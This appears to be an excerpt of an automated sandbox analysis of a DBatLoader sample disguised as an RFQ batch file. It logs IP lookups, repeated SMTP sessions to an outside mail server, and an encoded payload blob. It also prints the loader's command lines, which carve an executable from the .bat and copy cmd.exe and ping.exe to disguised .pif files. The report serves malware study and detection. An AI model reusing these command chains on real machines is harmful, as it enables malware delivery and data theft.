rm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52e
2024-11-21 16:00:14 UTC	16384	IN	Data Raw: 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 Data Ascii: KWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisrip

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49742	104.26.13.205	443	6424	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 16:00:26 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-21 16:00:26 UTC	399	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 16:00:26 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8e61e4846992435d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1843&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1650650&cwnd=128&unsent_bytes=0&cid=d41eb0a1c3e2c7b1&ts=487&x=0"
2024-11-21 16:00:26 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49775	104.26.13.205	443	5072	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 16:00:37 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-21 16:00:38 UTC	399	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 16:00:38 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8e61e4ce9dec8cda-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1845&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1554845&cwnd=239&unsent_bytes=0&cid=32fe294915e78a2b&ts=492&x=0"
2024-11-21 16:00:38 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49797	104.26.13.205	443	6344	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 16:00:48 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-21 16:00:48 UTC	399	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 16:00:48 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8e61e50ec8771a44-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1892&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1590413&cwnd=114&unsent_bytes=0&cid=fb58b9ee5743e1f8&ts=560&x=0"
2024-11-21 16:00:48 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 21, 2024 17:00:29.846848965 CET	587	49749	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:00:29 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:00:29.847146034 CET	49749	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:00:30.271219969 CET	587	49749	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:00:30.271703959 CET	49749	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:00:30.701157093 CET	587	49749	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:00:41.179049969 CET	587	49781	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:00:40 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:00:41.179328918 CET	49781	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:00:41.592478991 CET	587	49781	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:00:41.592700958 CET	49781	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:00:42.005294085 CET	587	49781	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:00:48.580899000 CET	587	49798	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:00:48 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:00:48.581091881 CET	49798	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:00:48.993161917 CET	587	49798	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:00:48.993350983 CET	49798	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:00:49.443989992 CET	587	49798	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:00:51.408502102 CET	587	49804	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:00:51 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:00:51.408782959 CET	49804	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:00:51.821098089 CET	587	49804	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:00:51.821510077 CET	49804	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:00:52.238437891 CET	587	49804	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:00:58.304411888 CET	587	49819	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:00:58 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:00:58.304702997 CET	49819	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:00:58.749177933 CET	587	49819	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:00:58.749380112 CET	49819	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:00:59.170792103 CET	587	49819	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:02:26.141112089 CET	587	49983	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:02:25 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:02:26.141349077 CET	49983	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:02:26.560761929 CET	587	49983	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:02:26.560919046 CET	49983	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:02:26.982738972 CET	587	49983	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:02:45.843790054 CET	587	49984	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:02:45 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:02:45.845877886 CET	49984	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:02:46.245250940 CET	587	49984	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:02:46.245512962 CET	49984	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:02:46.650758982 CET	587	49984	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:02:57.128953934 CET	587	49985	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:02:56 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:02:57.129121065 CET	49985	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:02:57.539310932 CET	587	49985	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:02:57.539520025 CET	49985	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:02:57.542956114 CET	587	49986	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:02:57 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:02:57.543157101 CET	49986	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:02:57.944479942 CET	587	49986	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:02:57.945343971 CET	49986	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:02:57.951304913 CET	587	49985	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:02:58.346807003 CET	587	49986	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:03:06.909136057 CET	587	49987	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:06 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:03:06.909249067 CET	49987	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:03:07.324314117 CET	587	49987	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:03:07.324490070 CET	49987	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:03:07.739378929 CET	587	49987	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:03:14.600337982 CET	587	49988	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:14 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:03:14.602309942 CET	49988	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:03:15.084573984 CET	587	49988	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:03:15.087930918 CET	49988	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:03:15.522279978 CET	587	49988	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:03:17.592255116 CET	587	49989	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:17 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:03:17.592413902 CET	49989	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:03:18.002196074 CET	587	49989	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:03:18.002374887 CET	49989	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:03:18.413007021 CET	587	49989	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:03:30.492500067 CET	587	49990	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:30 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:03:30.492811918 CET	49990	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:03:30.905002117 CET	587	49990	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:03:30.905433893 CET	49990	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:03:31.348866940 CET	587	49990	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:03:33.816375017 CET	587	49991	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:33 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:03:33.816545010 CET	49991	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:03:34.225655079 CET	587	49991	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:03:34.225812912 CET	49991	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:03:34.634048939 CET	587	49991	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:03:35.988289118 CET	587	49992	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:35 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:03:35.988452911 CET	49992	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:03:36.409637928 CET	587	49992	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:03:36.409751892 CET	49992	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:03:36.818676949 CET	587	49992	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:03:38.361756086 CET	587	49993	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:38 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:03:38.361922979 CET	49993	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:03:38.780723095 CET	587	49993	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:03:38.781373024 CET	49993	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:03:39.205532074 CET	587	49993	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:03:46.119208097 CET	587	49994	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:03:45 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:03:46.119364977 CET	49994	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:03:46.529697895 CET	587	49994	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:03:46.529927969 CET	49994	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:03:46.957148075 CET	587	49994	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:04:06.795191050 CET	587	49995	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:04:06 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:04:06.795577049 CET	49995	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:04:07.200015068 CET	587	49995	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:04:07.200716019 CET	49995	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:04:07.603255033 CET	587	49995	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:04:13.969471931 CET	587	49996	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:04:13 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:04:13.969623089 CET	49996	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:04:14.387814045 CET	587	49996	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:04:14.388119936 CET	49996	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:04:14.806406021 CET	587	49996	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:04:23.719291925 CET	587	49997	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:04:23 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:04:23.719635010 CET	49997	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:04:24.137075901 CET	587	49997	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 21, 2024 17:04:24.137295008 CET	49997	587	192.168.2.10	51.195.88.199	STARTTLS
Nov 21, 2024 17:04:24.556061983 CET	587	49997	51.195.88.199	192.168.2.10	220 TLS go ahead
Nov 21, 2024 17:04:24.732275963 CET	587	49998	51.195.88.199	192.168.2.10	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 21 Nov 2024 16:04:24 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2024 17:04:24.732393026 CET	49998	587	192.168.2.10	51.195.88.199	EHLO 724471
Nov 21, 2024 17:04:25.147684097 CET	587	49998	51.195.88.199	192.168.2.10	250-s82.gocheapweb.com Hello 724471 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP

Target ID:	0
Start time:	11:00:08
Start date:	21/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "
Imagebase:	0x7ff77f040000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:00:08
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:00:08
Start date:	21/11/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x7ff702720000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:00:09
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x400000
File size:	1'392'640 bytes
MD5 hash:	67DAC6AE9EE770115DB85CC71979DC41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:00:20
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:00:20
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:00:20
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase:	0xc90000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:00:21
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Imagebase:	0xc90000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:00:21
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Imagebase:	0xc90000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:00:22
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:00:22
Start date:	21/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:00:23
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0xa60000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
